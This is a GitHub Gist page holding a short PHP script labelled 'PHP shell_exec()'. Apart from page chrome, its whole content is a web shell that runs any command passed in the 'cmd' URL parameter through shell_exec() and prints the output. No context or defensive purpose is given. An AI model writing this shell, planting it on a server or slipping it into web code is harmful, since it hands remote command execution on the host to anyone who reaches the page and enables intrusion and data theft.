Created
April 4, 2019 10:53
-
-
Save hddananjaya/4033199203beabb65a93e33cbc2d5ae3 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- PHP shell_exec() --> | |
<?php | |
if (isset($_GET["cmd"])){ | |
$out=shell_exec($_GET["cmd"]); | |
echo($out); | |
} | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment